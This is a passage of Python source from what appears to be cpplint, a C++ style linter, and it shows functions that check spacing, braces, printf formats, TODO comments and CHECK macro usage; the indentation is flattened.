- put storage class first (e.g. "static const" instead of "const static").
- "%lld" instead of %qd" in printf-type functions.
- "%1$d" is non-standard in printf-type functions.
- "\%" is an undefined character escape sequence.
- text after #endif is not allowed.
- invalid inner-style forward declaration.
- >? and <? operators, and their >?= and <?= cousins.
Additionally, check for constructor/destructor style violations and reference
members, as it is very convenient to do so while checking for
gcc-2 compliance.
Args:
filename: The name of the current file.
clean_lines: A CleansedLines instance containing the file.
linenum: The number of the line to check.
nesting_state: A _NestingState instance which maintains information about
the current stack of nested blocks being parsed.
error: A callable to which errors are reported, which takes 4 arguments:
filename, line number, error level, and message
"""
# Remove comments from the line, but leave in strings for now.
line = clean_lines.lines[linenum]
if Search(r'printf\s*\(.*".*%[-+ ]?\d*q', line):
error(filename, linenum, 'runtime/printf_format', 3,
'%q in format strings is deprecated. Use %ll instead.')
if Search(r'printf\s*\(.*".*%\d+\$', line):
error(filename, linenum, 'runtime/printf_format', 2,
'%N$ formats are unconventional. Try rewriting to avoid them.')
# Remove escaped backslashes before looking for undefined escapes.
line = line.replace('\\\\', '')
if Search(r'("|\').*\\(%|\[|\(|{)', line):
error(filename, linenum, 'build/printf_format', 3,
'%, [, (, and { are undefined character escapes. Unescape them.')
# For the rest, work with both comments and strings removed.
line = clean_lines.elided[linenum]
if Search(r'\b(const|volatile|void|char|short|int|long'
r'|float|double|signed|unsigned'
r'|schar|u?int8|u?int16|u?int32|u?int64)'
r'\s+(register|static|extern|typedef)\b',
line):
error(filename, linenum, 'build/storage_class', 5,
'Storage class (static, extern, typedef, etc) should be first.')
if Match(r'\s*#\s*endif\s*[^/\s]+', line):
error(filename, linenum, 'build/endif_comment', 5,
'Uncommented text after #endif is non-standard. Use a comment.')
if Match(r'\s*class\s+(\w+\s*::\s*)+\w+\s*;', line):
error(filename, linenum, 'build/forward_decl', 5,
'Inner-style forward declarations are invalid. Remove this line.')
if Search(r'(\w+|[+-]?\d+(\.\d*)?)\s*(<|>)\?=?\s*(\w+|[+-]?\d+)(\.\d*)?',
line):
error(filename, linenum, 'build/deprecated', 3,
'>? and <? (max and min) operators are non-standard and deprecated.')
if Search(r'^\s*const\s*string\s*&\s*\w+\s*;', line):
# TODO(unknown): Could it be expanded safely to arbitrary references,
# without triggering too many false positives? The first
# attempt triggered 5 warnings for mostly benign code in the regtest, hence
# the restriction.
# Here's the original regexp, for the reference:
# type_name = r'\w+((\s*::\s*\w+)|(\s*<\s*\w+?\s*>))?'
# r'\s*const\s*' + type_name + '\s*&\s*\w+\s*;'
error(filename, linenum, 'runtime/member_string_references', 2,
'const string& members are dangerous. It is much better to use '
'alternatives, such as pointers or simple constants.')
# Everything else in this function operates on class declarations.
# Return early if the top of the nesting stack is not a class, or if
# the class head is not completed yet.
classinfo = nesting_state.InnermostClass()
if not classinfo or not classinfo.seen_open_brace:
return
# The class may have been declared with namespace or classname qualifiers.
# The constructor and destructor will not have those qualifiers.
base_classname = classinfo.name.split('::')[-1]
# Look for single-argument constructors that aren't marked explicit.
# Technically a valid construct, but against style.
args = Match(r'\s+(?:inline\s+)?%s\s*\(([^,()]+)\)'
% re.escape(base_classname),
line)
if (args and
args.group(1) != 'void' and
not Match(r'(const\s+)?%s\s*(?:<\w+>\s*)?&' % re.escape(base_classname),
args.group(1).strip())):
error(filename, linenum, 'runtime/explicit', 5,
'Single-argument constructors should be marked explicit.')
def CheckSpacingForFunctionCall(filename, line, linenum, error):
"""Checks for the correctness of various spacing around function calls.
Args:
filename: The name of the current file.
line: The text of the line to check.
linenum: The number of the line to check.
error: The function to call with any errors found.
"""
# Since function calls often occur inside if/for/while/switch
# expressions - which have their own, more liberal conventions - we
# first see if we should be looking inside such an expression for a
# function call, to which we can apply more strict standards.
fncall = line # if there's no control flow construct, look at whole line
for pattern in (r'\bif\s*\((.*)\)\s*{',
r'\bfor\s*\((.*)\)\s*{',
r'\bwhile\s*\((.*)\)\s*[{;]',
r'\bswitch\s*\((.*)\)\s*{'):
match = Search(pattern, line)
if match:
fncall = match.group(1) # look inside the parens for function calls
break
# Except in if/for/while/switch, there should never be space
# immediately inside parens (eg "f( 3, 4 )"). We make an exception
# for nested parens ( (a+b) + c ). Likewise, there should never be
# a space before a ( when it's a function argument. I assume it's a
# function argument when the char before the whitespace is legal in
# a function name (alnum + _) and we're not starting a macro. Also ignore
# pointers and references to arrays and functions coz they're too tricky:
# we use a very simple way to recognize these:
# " (something)(maybe-something)" or
# " (something)(maybe-something," or
# " (something)[something]"
# Note that we assume the contents of [] to be short enough that
# they'll never need to wrap.
if ( # Ignore control structures.
not Search(r'\b(if|for|while|switch|return|delete)\b', fncall) and
# Ignore pointers/references to functions.
not Search(r' \([^)]+\)\([^)]*(\)|,$)', fncall) and
# Ignore pointers/references to arrays.
not Search(r' \([^)]+\)\[[^\]]+\]', fncall)):
if Search(r'\w\s*\(\s(?!\s*\\$)', fncall): # a ( used for a fn call
error(filename, linenum, 'whitespace/parens', 4,
'Extra space after ( in function call')
elif Search(r'\(\s+(?!(\s*\\)|\()', fncall):
error(filename, linenum, 'whitespace/parens', 2,
'Extra space after (')
if (Search(r'\w\s+\(', fncall) and
not Search(r'#\s*define|typedef', fncall) and
not Search(r'\w\s+\((\w+::)?\*\w+\)\(', fncall)):
error(filename, linenum, 'whitespace/parens', 4,
'Extra space before ( in function call')
# If the ) is followed only by a newline or a { + newline, assume it's
# part of a control statement (if/while/etc), and don't complain
if Search(r'[^)]\s+\)\s*[^{\s]', fncall):
# If the closing parenthesis is preceded by only whitespaces,
# try to give a more descriptive error message.
if Search(r'^\s+\)', fncall):
error(filename, linenum, 'whitespace/parens', 2,
'Closing ) should be moved to the previous line')
else:
error(filename, linenum, 'whitespace/parens', 2,
'Extra space before )')
def IsBlankLine(line):
"""Returns true if the given line is blank.
We consider a line to be blank if the line is empty or consists of
only white spaces.
Args:
line: A line of a string.
Returns:
True, if the given line is blank.
"""
return not line or line.isspace()
def CheckForFunctionLengths(filename, clean_lines, linenum,
function_state, error):
"""Reports for long function bodies.
For an overview why this is done, see:
http://google-styleguide.googlecode.com/svn/trunk/cppguide.xml#Write_Short_Functions
Uses a simplistic algorithm assuming other style guidelines
(especially spacing) are followed.
Only checks unindented functions, so class members are unchecked.
Trivial bodies are unchecked, so constructors with huge initializer lists
may be missed.
Blank/comment lines are not counted so as to avoid encouraging the removal
of vertical space and comments just to get through a lint check.
NOLINT *on the last line of a function* disables this check.
Args:
filename: The name of the current file.
clean_lines: A CleansedLines instance containing the file.
linenum: The number of the line to check.
function_state: Current function name and lines in body so far.
error: The function to call with any errors found.
"""
lines = clean_lines.lines
line = lines[linenum]
raw = clean_lines.raw_lines
raw_line = raw[linenum]
joined_line = ''
starting_func = False
regexp = r'(\w(\w|::|\*|\&|\s)*)\(' # decls * & space::name( ...
match_result = Match(regexp, line)
if match_result:
# If the name is all caps and underscores, figure it's a macro and
# ignore it, unless it's TEST or TEST_F.
function_name = match_result.group(1).split()[-1]
if function_name == 'TEST' or function_name == 'TEST_F' or (
not Match(r'[A-Z_]+$', function_name)):
starting_func = True
if starting_func:
body_found = False
for start_linenum in xrange(linenum, clean_lines.NumLines()):
start_line = lines[start_linenum]
joined_line += ' ' + start_line.lstrip()
if Search(r'(;|})', start_line): # Declarations and trivial functions
body_found = True
break # ... ignore
elif Search(r'{', start_line):
body_found = True
function = Search(r'((\w|:)*)\(', line).group(1)
if Match(r'TEST', function): # Handle TEST... macros
parameter_regexp = Search(r'(\(.*\))', joined_line)
if parameter_regexp: # Ignore bad syntax
function += parameter_regexp.group(1)
else:
function += '()'
function_state.Begin(function)
break
if not body_found:
# No body for the function (or evidence of a non-function) was found.
error(filename, linenum, 'readability/fn_size', 5,
'Lint failed to find start of function body.')
elif Match(r'^\}\s*$', line): # function end
function_state.Check(error, filename, linenum)
function_state.End()
elif not Match(r'^\s*$', line):
function_state.Count() # Count non-blank/non-comment lines.
_RE_PATTERN_TODO = re.compile(r'^//(\s*)TODO(\(.+?\))?:?(\s|$)?')
def CheckComment(comment, filename, linenum, error):
"""Checks for common mistakes in TODO comments.
Args:
comment: The text of the comment from the line in question.
filename: The name of the current file.
linenum: The number of the line to check.
error: The function to call with any errors found.
"""
match = _RE_PATTERN_TODO.match(comment)
if match:
# One whitespace is correct; zero whitespace is handled elsewhere.
leading_whitespace = match.group(1)
if len(leading_whitespace) > 1:
error(filename, linenum, 'whitespace/todo', 2,
'Too many spaces before TODO')
username = match.group(2)
if not username:
error(filename, linenum, 'readability/todo', 2,
'Missing username in TODO; it should look like '
'"// TODO(my_username): Stuff."')
middle_whitespace = match.group(3)
# Comparisons made explicit for correctness -- pylint: disable-msg=C6403
if middle_whitespace != ' ' and middle_whitespace != '':
error(filename, linenum, 'whitespace/todo', 2,
'TODO(my_username) should be followed by a space')
def CheckAccess(filename, clean_lines, linenum, nesting_state, error):
"""Checks for improper use of DISALLOW* macros.
Args:
filename: The name of the current file.
clean_lines: A CleansedLines instance containing the file.
linenum: The number of the line to check.
nesting_state: A _NestingState instance which maintains information about
the current stack of nested blocks being parsed.
error: The function to call with any errors found.
"""
line = clean_lines.elided[linenum] # get rid of comments and strings
matched = Match((r'\s*(DISALLOW_COPY_AND_ASSIGN|'
r'DISALLOW_EVIL_CONSTRUCTORS|'
r'DISALLOW_IMPLICIT_CONSTRUCTORS)'), line)
if not matched:
return
if nesting_state.stack and isinstance(nesting_state.stack[-1], _ClassInfo):
if nesting_state.stack[-1].access != 'private':
error(filename, linenum, 'readability/constructors', 3,
'%s must be in the private: section' % matched.group(1))
else:
# Found DISALLOW* macro outside a class declaration, or perhaps it
# was used inside a function when it should have been part of the
# class declaration. We could issue a warning here, but it
# probably resulted in a compiler error already.
pass
def FindNextMatchingAngleBracket(clean_lines, linenum, init_suffix):
"""Find the corresponding > to close a template.
Args:
clean_lines: A CleansedLines instance containing the file.
linenum: Current line number.
init_suffix: Remainder of the current line after the initial <.
Returns:
True if a matching bracket exists.
"""
line = init_suffix
nesting_stack = ['<']
while True:
# Find the next operator that can tell us whether < is used as an
# opening bracket or as a less-than operator. We only want to
# warn on the latter case.
#
# We could also check all other operators and terminate the search
# early, e.g. if we got something like this "a<b+c", the "<" is
# most likely a less-than operator, but then we will get false
# positives for default arguments (e.g. http://go/prccd) and
# other template expressions (e.g. http://go/oxcjq).
match = Search(r'^[^<>(),;\[\]]*([<>(),;\[\]])(.*)$', line)
if match:
# Found an operator, update nesting stack
operator = match.group(1)
line = match.group(2)
if nesting_stack[-1] == '<':
# Expecting closing angle bracket
if operator in ('<', '(', '['):
nesting_stack.append(operator)
elif operator == '>':
nesting_stack.pop()
if not nesting_stack:
# Found matching angle bracket
return True
elif operator == ',':
# Got a comma after a bracket, this is most likely a template
# argument. We have not seen a closing angle bracket yet, but
# it's probably a few lines later if we look for it, so just
# return early here.
return True
else:
# Got some other operator.
return False
else:
# Expecting closing parenthesis or closing bracket
if operator in ('<', '(', '['):
nesting_stack.append(operator)
elif operator in (')', ']'):
# We don't bother checking for matching () or []. If we got
# something like (] or [), it would have been a syntax error.
nesting_stack.pop()
else:
# Scan the next line
linenum += 1
if linenum >= len(clean_lines.elided):
break
line = clean_lines.elided[linenum]
# Exhausted all remaining lines and still no matching angle bracket.
# Most likely the input was incomplete, otherwise we should have
# seen a semicolon and returned early.
return True
def FindPreviousMatchingAngleBracket(clean_lines, linenum, init_prefix):
"""Find the corresponding < that started a template.
Args:
clean_lines: A CleansedLines instance containing the file.
linenum: Current line number.
init_prefix: Part of the current line before the initial >.
Returns:
True if a matching bracket exists.
"""
line = init_prefix
nesting_stack = ['>']
while True:
# Find the previous operator
match = Search(r'^(.*)([<>(),;\[\]])[^<>(),;\[\]]*$', line)
if match:
# Found an operator, update nesting stack
operator = match.group(2)
line = match.group(1)
if nesting_stack[-1] == '>':
# Expecting opening angle bracket
if operator in ('>', ')', ']'):
nesting_stack.append(operator)
elif operator == '<':
nesting_stack.pop()
if not nesting_stack:
# Found matching angle bracket
return True
elif operator == ',':
# Got a comma before a bracket, this is most likely a
# template argument. The opening angle bracket is probably
# there if we look for it, so just return early here.
return True
else:
# Got some other operator.
return False
else:
# Expecting opening parenthesis or opening bracket
if operator in ('>', ')', ']'):
nesting_stack.append(operator)
elif operator in ('(', '['):
nesting_stack.pop()
else:
# Scan the previous line
linenum -= 1
if linenum < 0:
break
line = clean_lines.elided[linenum]
# Exhausted all earlier lines and still no matching angle bracket.
return False
def CheckSpacing(filename, clean_lines, linenum, nesting_state, error):
"""Checks for the correctness of various spacing issues in the code.
Things we check for: spaces around operators, spaces after
if/for/while/switch, no spaces around parens in function calls, two
spaces between code and comment, don't start a block with a blank
line, don't end a function with a blank line, don't add a blank line
after public/protected/private, don't have too many blank lines in a row.
Args:
filename: The name of the current file.
clean_lines: A CleansedLines instance containing the file.
linenum: The number of the line to check.
nesting_state: A _NestingState instance which maintains information about
the current stack of nested blocks being parsed.
error: The function to call with any errors found.
"""
raw = clean_lines.raw_lines
line = raw[linenum]
# Before nixing comments, check if the line is blank for no good
# reason. This includes the first line after a block is opened, and
# blank lines at the end of a function (ie, right before a line like '}'
#
# Skip all the blank line checks if we are immediately inside a
# namespace body. In other words, don't issue blank line warnings
# for this block:
# namespace {
#
# }
#
# A warning about missing end of namespace comments will be issued instead.
if IsBlankLine(line) and not nesting_state.InNamespaceBody():
elided = clean_lines.elided
prev_line = elided[linenum - 1]
prevbrace = prev_line.rfind('{')
# TODO(unknown): Don't complain if line before blank line, and line after,
# both start with alnums and are indented the same amount.
# This ignores whitespace at the start of a namespace block
# because those are not usually indented.
if prevbrace != -1 and prev_line[prevbrace:].find('}') == -1:
# OK, we have a blank line at the start of a code block. Before we
# complain, we check if it is an exception to the rule: The previous
# non-empty line has the parameters of a function header that are indented
# 4 spaces (because they did not fit in a 80 column line when placed on
# the same line as the function name). We also check for the case where
# the previous line is indented 6 spaces, which may happen when the
# initializers of a constructor do not fit into a 80 column line.
exception = False
if Match(r' {6}\w', prev_line): # Initializer list?
# We are looking for the opening column of initializer list, which
# should be indented 4 spaces to cause 6 space indentation afterwards.
search_position = linenum-2
while (search_position >= 0
and Match(r' {6}\w', elided[search_position])):
search_position -= 1
exception = (search_position >= 0
and elided[search_position][:5] == ' :')
else:
# Search for the function arguments or an initializer list. We use a
# simple heuristic here: If the line is indented 4 spaces; and we have a
# closing paren, without the opening paren, followed by an opening brace
# or colon (for initializer lists) we assume that it is the last line of
# a function header. If we have a colon indented 4 spaces, it is an
# initializer list.
exception = (Match(r' {4}\w[^\(]*\)\s*(const\s*)?(\{\s*$|:)',
prev_line)
or Match(r' {4}:', prev_line))
if not exception:
error(filename, linenum, 'whitespace/blank_line', 2,
'Blank line at the start of a code block. Is this needed?')
# Ignore blank lines at the end of a block in a long if-else
# chain, like this:
# if (condition1) {
# // Something followed by a blank line
#
# } else if (condition2) {
# // Something else
# }
if linenum + 1 < clean_lines.NumLines():
next_line = raw[linenum + 1]
if (next_line
and Match(r'\s*}', next_line)
and next_line.find('} else ') == -1):
error(filename, linenum, 'whitespace/blank_line', 3,
'Blank line at the end of a code block. Is this needed?')
matched = Match(r'\s*(public|protected|private):', prev_line)
if matched:
error(filename, linenum, 'whitespace/blank_line', 3,
'Do not leave a blank line after "%s:"' % matched.group(1))
# Next, we complain if there's a comment too near the text
commentpos = line.find('//')
if commentpos != -1:
# Check if the // may be in quotes. If so, ignore it
# Comparisons made explicit for clarity -- pylint: disable-msg=C6403
if (line.count('"', 0, commentpos) -
line.count('\\"', 0, commentpos)) % 2 == 0: # not in quotes
# Allow one space for new scopes, two spaces otherwise:
if (not Match(r'^\s*{ //', line) and
((commentpos >= 1 and
line[commentpos-1] not in string.whitespace) or
(commentpos >= 2 and
line[commentpos-2] not in string.whitespace))):
error(filename, linenum, 'whitespace/comments', 2,
'At least two spaces is best between code and comments')
# There should always be a space between the // and the comment
commentend = commentpos + 2
if commentend < len(line) and not line[commentend] == ' ':
# but some lines are exceptions -- e.g. if they're big
# comment delimiters like:
# //----------------------------------------------------------
# or are an empty C++ style Doxygen comment, like:
# ///
# or they begin with multiple slashes followed by a space:
# //////// Header comment
match = (Search(r'[=/-]{4,}\s*$', line[commentend:]) or
Search(r'^/$', line[commentend:]) or
Search(r'^/+ ', line[commentend:]))
if not match:
error(filename, linenum, 'whitespace/comments', 4,
'Should have a space between // and comment')
CheckComment(line[commentpos:], filename, linenum, error)
line = clean_lines.elided[linenum] # get rid of comments and strings
# Don't try to do spacing checks for operator methods
line = re.sub(r'operator(==|!=|<|<<|<=|>=|>>|>)\(', 'operator\(', line)
# We allow no-spaces around = within an if: "if ( (a=Foo()) == 0 )".
# Otherwise not. Note we only check for non-spaces on *both* sides;
# sometimes people put non-spaces on one side when aligning ='s among
# many lines (not that this is behavior that I approve of...)
if Search(r'[\w.]=[\w.]', line) and not Search(r'\b(if|while) ', line):
error(filename, linenum, 'whitespace/operators', 4,
'Missing spaces around =')
# It's ok not to have spaces around binary operators like + - * /, but if
# there's too little whitespace, we get concerned. It's hard to tell,
# though, so we punt on this one for now. TODO.
# You should always have whitespace around binary operators.
#
# Check <= and >= first to avoid false positives with < and >, then
# check non-include lines for spacing around < and >.
match = Search(r'[^<>=!\s](==|!=|<=|>=)[^<>=!\s]', line)
if match:
error(filename, linenum, 'whitespace/operators', 3,
'Missing spaces around %s' % match.group(1))
# We allow no-spaces around << when used like this: 10<<20, but
# not otherwise (particularly, not when used as streams)
match = Search(r'(\S)(?:L|UL|ULL|l|ul|ull)?<<(\S)', line)
if match and not (match.group(1).isdigit() and match.group(2).isdigit()):
error(filename, linenum, 'whitespace/operators', 3,
'Missing spaces around <<')
elif not Match(r'#.*include', line):
# Avoid false positives on ->
reduced_line = line.replace('->', '')
# Look for < that is not surrounded by spaces. This is only
# triggered if both sides are missing spaces, even though
# technically should should flag if at least one side is missing a
# space. This is done to avoid some false positives with shifts.
match = Search(r'[^\s<]<([^\s=<].*)', reduced_line)
if (match and
not FindNextMatchingAngleBracket(clean_lines, linenum, match.group(1))):
error(filename, linenum, 'whitespace/operators', 3,
'Missing spaces around <')
# Look for > that is not surrounded by spaces. Similar to the
# above, we only trigger if both sides are missing spaces to avoid
# false positives with shifts.
match = Search(r'^(.*[^\s>])>[^\s=>]', reduced_line)
if (match and
not FindPreviousMatchingAngleBracket(clean_lines, linenum,
match.group(1))):
error(filename, linenum, 'whitespace/operators', 3,
'Missing spaces around >')
# We allow no-spaces around >> for almost anything. This is because
# C++11 allows ">>" to close nested templates, which accounts for
# most cases when ">>" is not followed by a space.
#
# We still warn on ">>" followed by alpha character, because that is
# likely due to ">>" being used for right shifts, e.g.:
# value >> alpha
#
# When ">>" is used to close templates, the alphanumeric letter that
# follows would be part of an identifier, and there should still be
# a space separating the template type and the identifier.
# type<type<type>> alpha
match = Search(r'>>[a-zA-Z_]', line)
if match:
error(filename, linenum, 'whitespace/operators', 3,
'Missing spaces around >>')
# There shouldn't be space around unary operators
match = Search(r'(!\s|~\s|[\s]--[\s;]|[\s]\+\+[\s;])', line)
if match:
error(filename, linenum, 'whitespace/operators', 4,
'Extra space for operator %s' % match.group(1))
# A pet peeve of mine: no spaces after an if, while, switch, or for
match = Search(r' (if\(|for\(|while\(|switch\()', line)
if match:
error(filename, linenum, 'whitespace/parens', 5,
'Missing space before ( in %s' % match.group(1))
# For if/for/while/switch, the left and right parens should be
# consistent about how many spaces are inside the parens, and
# there should either be zero or one spaces inside the parens.
# We don't want: "if ( foo)" or "if ( foo )".
# Exception: "for ( ; foo; bar)" and "for (foo; bar; )" are allowed.
match = Search(r'\b(if|for|while|switch)\s*'
r'\(([ ]*)(.).*[^ ]+([ ]*)\)\s*{\s*$',
line)
if match:
if len(match.group(2)) != len(match.group(4)):
if not (match.group(3) == ';' and
len(match.group(2)) == 1 + len(match.group(4)) or
not match.group(2) and Search(r'\bfor\s*\(.*; \)', line)):
error(filename, linenum, 'whitespace/parens', 5,
'Mismatching spaces inside () in %s' % match.group(1))
if not len(match.group(2)) in [0, 1]:
error(filename, linenum, 'whitespace/parens', 5,
'Should have zero or one spaces inside ( and ) in %s' %
match.group(1))
# You should always have a space after a comma (either as fn arg or operator)
if Search(r',[^\s]', line):
error(filename, linenum, 'whitespace/comma', 3,
'Missing space after ,')
# You should always have a space after a semicolon
# except for few corner cases
# TODO(unknown): clarify if 'if (1) { return 1;}' is requires one more
# space after ;
if Search(r';[^\s};\\)/]', line):
error(filename, linenum, 'whitespace/semicolon', 3,
'Missing space after ;')
# Next we will look for issues with function calls.
CheckSpacingForFunctionCall(filename, line, linenum, error)
# Except after an opening paren, or after another opening brace (in case of
# an initializer list, for instance), you should have spaces before your
# braces. And since you should never have braces at the beginning of a line,
# this is an easy test.
if Search(r'[^ ({]{', line):
error(filename, linenum, 'whitespace/braces', 5,
'Missing space before {')
# Make sure '} else {' has spaces.
if Search(r'}else', line):
error(filename, linenum, 'whitespace/braces', 5,
'Missing space before else')
# You shouldn't have spaces before your brackets, except maybe after
# 'delete []' or 'new char * []'.
if Search(r'\w\s+\[', line) and not Search(r'delete\s+\[', line):
error(filename, linenum, 'whitespace/braces', 5,
'Extra space before [')
# You shouldn't have a space before a semicolon at the end of the line.
# There's a special case for "for" since the style guide allows space before
# the semicolon there.
if Search(r':\s*;\s*$', line):
error(filename, linenum, 'whitespace/semicolon', 5,
'Semicolon defining empty statement. Use {} instead.')
elif Search(r'^\s*;\s*$', line):
error(filename, linenum, 'whitespace/semicolon', 5,
'Line contains only semicolon. If this should be an empty statement, '
'use {} instead.')
elif (Search(r'\s+;\s*$', line) and
not Search(r'\bfor\b', line)):
error(filename, linenum, 'whitespace/semicolon', 5,
'Extra space before last semicolon. If this should be an empty '
'statement, use {} instead.')
# In range-based for, we wanted spaces before and after the colon, but
# not around "::" tokens that might appear.
if (Search('for *\(.*[^:]:[^: ]', line) or
Search('for *\(.*[^: ]:[^:]', line)):
error(filename, linenum, 'whitespace/forcolon', 2,
'Missing space around colon in range-based for loop')
def CheckSectionSpacing(filename, clean_lines, class_info, linenum, error):
"""Checks for additional blank line issues related to sections.
Currently the only thing checked here is blank line before protected/private.
Args:
filename: The name of the current file.
clean_lines: A CleansedLines instance containing the file.
class_info: A _ClassInfo objects.
linenum: The number of the line to check.
error: The function to call with any errors found.
"""
# Skip checks if the class is small, where small means 25 lines or less.
# 25 lines seems like a good cutoff since that's the usual height of
# terminals, and any class that can't fit in one screen can't really
# be considered "small".
#
# Also skip checks if we are on the first line. This accounts for
# classes that look like
# class Foo { public: ... };
#
# If we didn't find the end of the class, last_line would be zero,
# and the check will be skipped by the first condition.
if (class_info.last_line - class_info.starting_linenum <= 24 or
linenum <= class_info.starting_linenum):
return
matched = Match(r'\s*(public|protected|private):', clean_lines.lines[linenum])
if matched:
# Issue warning if the line before public/protected/private was
# not a blank line, but don't do this if the previous line contains
# "class" or "struct". This can happen two ways:
# - We are at the beginning of the class.
# - We are forward-declaring an inner class that is semantically
# private, but needed to be public for implementation reasons.
# Also ignores cases where the previous line ends with a backslash as can be
# common when defining classes in C macros.
prev_line = clean_lines.lines[linenum - 1]
if (not IsBlankLine(prev_line) and
not Search(r'\b(class|struct)\b', prev_line) and
not Search(r'\\$', prev_line)):
# Try a bit harder to find the beginning of the class. This is to
# account for multi-line base-specifier lists, e.g.:
# class Derived
# : public Base {
end_class_head = class_info.starting_linenum
for i in range(class_info.starting_linenum, linenum):
if Search(r'\{\s*$', clean_lines.lines[i]):
end_class_head = i
break
if end_class_head < linenum - 1:
error(filename, linenum, 'whitespace/blank_line', 3,
'"%s:" should be preceded by a blank line' % matched.group(1))
def GetPreviousNonBlankLine(clean_lines, linenum):
"""Return the most recent non-blank line and its line number.
Args:
clean_lines: A CleansedLines instance containing the file contents.
linenum: The number of the line to check.
Returns:
A tuple with two elements. The first element is the contents of the last
non-blank line before the current line, or the empty string if this is the
first non-blank line. The second is the line number of that line, or -1
if this is the first non-blank line.
"""
prevlinenum = linenum - 1
while prevlinenum >= 0:
prevline = clean_lines.elided[prevlinenum]
if not IsBlankLine(prevline): # if not a blank line...
return (prevline, prevlinenum)
prevlinenum -= 1
return ('', -1)
def CheckBraces(filename, clean_lines, linenum, error):
"""Looks for misplaced braces (e.g. at the end of line).
Args:
filename: The name of the current file.
clean_lines: A CleansedLines instance containing the file.
linenum: The number of the line to check.
error: The function to call with any errors found.
"""
line = clean_lines.elided[linenum] # get rid of comments and strings
if Match(r'\s*{\s*$', line):
# We allow an open brace to start a line in the case where someone
# is using braces in a block to explicitly create a new scope,
# which is commonly used to control the lifetime of
# stack-allocated variables. We don't detect this perfectly: we
# just don't complain if the last non-whitespace character on the
# previous non-blank line is ';', ':', '{', or '}', or if the previous
# line starts a preprocessor block.
prevline = GetPreviousNonBlankLine(clean_lines, linenum)[0]
if (not Search(r'[;:}{]\s*$', prevline) and
not Match(r'\s*#', prevline)):
error(filename, linenum, 'whitespace/braces', 4,
'{ should almost always be at the end of the previous line')
# An else clause should be on the same line as the preceding closing brace.
if Match(r'\s*else\s*', line):
prevline = GetPreviousNonBlankLine(clean_lines, linenum)[0]
if Match(r'\s*}\s*$', prevline):
error(filename, linenum, 'whitespace/newline', 4,
'An else should appear on the same line as the preceding }')
# If braces come on one side of an else, they should be on both.
# However, we have to worry about "else if" that spans multiple lines!
if Search(r'}\s*else[^{]*$', line) or Match(r'[^}]*else\s*{', line):
if Search(r'}\s*else if([^{]*)$', line): # could be multi-line if
# find the ( after the if
pos = line.find('else if')
pos = line.find('(', pos)
if pos > 0:
(endline, _, endpos) = CloseExpression(clean_lines, linenum, pos)
if endline[endpos:].find('{') == -1: # must be brace after if
error(filename, linenum, 'readability/braces', 5,
'If an else has a brace on one side, it should have it on both')
else: # common case: else not followed by a multi-line if
error(filename, linenum, 'readability/braces', 5,
'If an else has a brace on one side, it should have it on both')
# Likewise, an else should never have the else clause on the same line
if Search(r'\belse [^\s{]', line) and not Search(r'\belse if\b', line):
error(filename, linenum, 'whitespace/newline', 4,
'Else clause should never be on same line as else (use 2 lines)')
# In the same way, a do/while should never be on one line
if Match(r'\s*do [^\s{]', line):
error(filename, linenum, 'whitespace/newline', 4,
'do/while clauses should not be on a single line')
# Braces shouldn't be followed by a ; unless they're defining a struct
# or initializing an array.
# We can't tell in general, but we can for some common cases.
prevlinenum = linenum
while True:
(prevline, prevlinenum) = GetPreviousNonBlankLine(clean_lines, prevlinenum)
if Match(r'\s+{.*}\s*;', line) and not prevline.count(';'):
line = prevline + line
else:
break
if (Search(r'{.*}\s*;', line) and
line.count('{') == line.count('}') and
not Search(r'struct|class|enum|\s*=\s*{', line)):
error(filename, linenum, 'readability/braces', 4,
"You don't need a ; after a }")
def CheckEmptyLoopBody(filename, clean_lines, linenum, error):
"""Loop for empty loop body with only a single semicolon.
Args:
filename: The name of the current file.
clean_lines: A CleansedLines instance containing the file.
linenum: The number of the line to check.
error: The function to call with any errors found.
"""
# Search for loop keywords at the beginning of the line. Because only
# whitespaces are allowed before the keywords, this will also ignore most
# do-while-loops, since those lines should start with closing brace.
line = clean_lines.elided[linenum]
if Match(r'\s*(for|while)\s*\(', line):
# Find the end of the conditional expression
(end_line, end_linenum, end_pos) = CloseExpression(
clean_lines, linenum, line.find('('))
# Output warning if what follows the condition expression is a semicolon.
# No warning for all other cases, including whitespace or newline, since we
# have a separate check for semicolons preceded by whitespace.
if end_pos >= 0 and Match(r';', end_line[end_pos:]):
error(filename, end_linenum, 'whitespace/empty_loop_body', 5,
'Empty loop bodies should use {} or continue')
def ReplaceableCheck(operator, macro, line):
"""Determine whether a basic CHECK can be replaced with a more specific one.
For example suggest using CHECK_EQ instead of CHECK(a == b) and
similarly for CHECK_GE, CHECK_GT, CHECK_LE, CHECK_LT, CHECK_NE.
Args:
operator: The C++ operator used in the CHECK.
macro: The CHECK or EXPECT macro being called.
line: The current source line.
Returns:
True if the CHECK can be replaced with a more specific one.
"""
# This matches decimal and hex integers, strings, and chars (in that order).
match_constant = r'([-+]?(\d+|0[xX][0-9a-fA-F]+)[lLuU]{0,3}|".*"|\'.*\')'
# Expression to match two sides of the operator with something that
# looks like a literal, since CHECK(x == iterator) won't compile.
# This means we can't catch all the cases where a more specific
# CHECK is possible, but it's less annoying than dealing with
# extraneous warnings.
match_this = (r'\s*' + macro + r'\((\s*' +
match_constant + r'\s*' + operator + r'[^<>].*|'
r'.*[^<>]' + operator + r'\s*' + match_constant +
r'\s*\))')
# Don't complain about CHECK(x == NULL) or similar because
# CHECK_EQ(x, NULL) won't compile (requires a cast).
# Also, don't complain about more complex boolean expressions
# involving && or || such as CHECK(a == b || c == d).
return Match(match_this, line) and not Search(r'NULL|&&|\|\|', line)
def CheckCheck(filename, clean_lines, linenum, error):
"""Checks the use of CHECK and EXPECT macros.
Args:
filename: The name of the current file.
clean_lines: A CleansedLines instance containing the file.
linenum: The number of the line to check.
error: The function to call with any errors found.
"""
# Decide the set of replacement macros that should be suggested
raw_lines = clean_lines.raw_lines
current_macro = ''
for macro in _CHECK_MACROS:
if raw_lines[linenum].find(macro) >= 0:
current_macro = macro
break
if not current_macro:
# Don't waste time here if line doesn't contain 'CHECK' or 'EXPECT'
return
line = clean_lines.elided[linenum] # get rid of comments and strings
# Encourage replacing plain CHECKs with CHECK_EQ/CHECK_NE/etc.
for operator in ['==', '!=', '>=', '>', '<=', '<']:
if ReplaceableCheck(operator, current_macro, line):
error(filename, linenum, 'readability/check', 2,
'Consider using %s instead of %s(a %s b)' % (
_CHECK_REPLACEMENT[current_macro][operator],
current_macro, operator))
break
def CheckAltTokens(filename, clean_lines, linenum, error):
"""Check alternative keywords being used in boolean expressions.
Args:
filename: The name of the current file.
clean_lines: A CleansedLines instance containing the file.
linenum: The number of the line to check.
